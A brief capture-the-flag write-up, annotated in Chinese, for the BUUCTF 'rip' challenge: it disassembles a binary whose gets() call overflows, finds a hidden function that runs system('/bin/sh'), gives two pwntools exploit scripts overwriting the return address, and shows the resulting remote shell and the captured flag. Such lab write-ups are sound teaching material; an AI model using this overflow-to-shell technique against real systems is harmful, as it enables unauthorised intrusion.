BUU-2-rip
lxl@lxl-vm:~/BUU/rip$ file pwn1 pwn1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=1c72ddcad651c7f35bb655e0ddda5ecbf8d31999, not stripped
IDA 64
int __cdecl main(int argc, const char **argv, const char **envp) { char s; // [rsp+1h] [rbp-Fh] puts("please input"); gets(&s, argv); puts(&s); puts("ok,bye!!!"); return 0; }
gets可溢出
偏移量:0xF+8
直接shift+F12
.text:0000000000401186 .text:0000000000401186 ; =============== S U B R O U T I N E ======================================= .text:0000000000401186 .text:0000000000401186 ; Attributes: bp-based frame .text:0000000000401186 .text:0000000000401186 public fun .text:0000000000401186 fun proc near .text:0000000000401186 ; __unwind { .text:0000000000401186 push rbp //重点! .text:0000000000401187 mov rbp, rsp .text:000000000040118A lea rdi, command ; "/bin/sh" .text:0000000000401191 call _system .text:0000000000401196 nop .text:0000000000401197 pop rbp .text:0000000000401198 retn .text:0000000000401198 ; } // starts at 401186 .text:0000000000401198 fun endp
EXP
from pwn import * p = remote('node3.buuoj.cn',26819) sys_addr = 0x401186 payload = 0xf*'a' +'a'*8 + p64(sys_addr) p.sendline(payload) p.interactive()
查看WP后:
from pwn import * p = remote('node3.buuoj.cn',27563) sys_addr = 0x401186 payload = 0xf*'a' +'a'*8 + p64(sys_addr) + p64(sys_addr) p.sendline(payload) p.interactive()
???为嘛多写个地址呢???(但是这样才能不timeout)
lxl@lxl-vm:~/BUU/rip$ python pwn1.py [+] Opening connection to node3.buuoj.cn on port 27563: Done [*] Switching to interactive mode $ ls bin boot dev etc flag home lib lib32 lib64 media mnt opt proc pwn root run sbin srv sys tmp usr var $ cat flag flag{8bd85f48-eb08-42ab-b770-62449fb5d2fe} $
flag{8bd85f48-eb08-42ab-b770-62449fb5d2fe}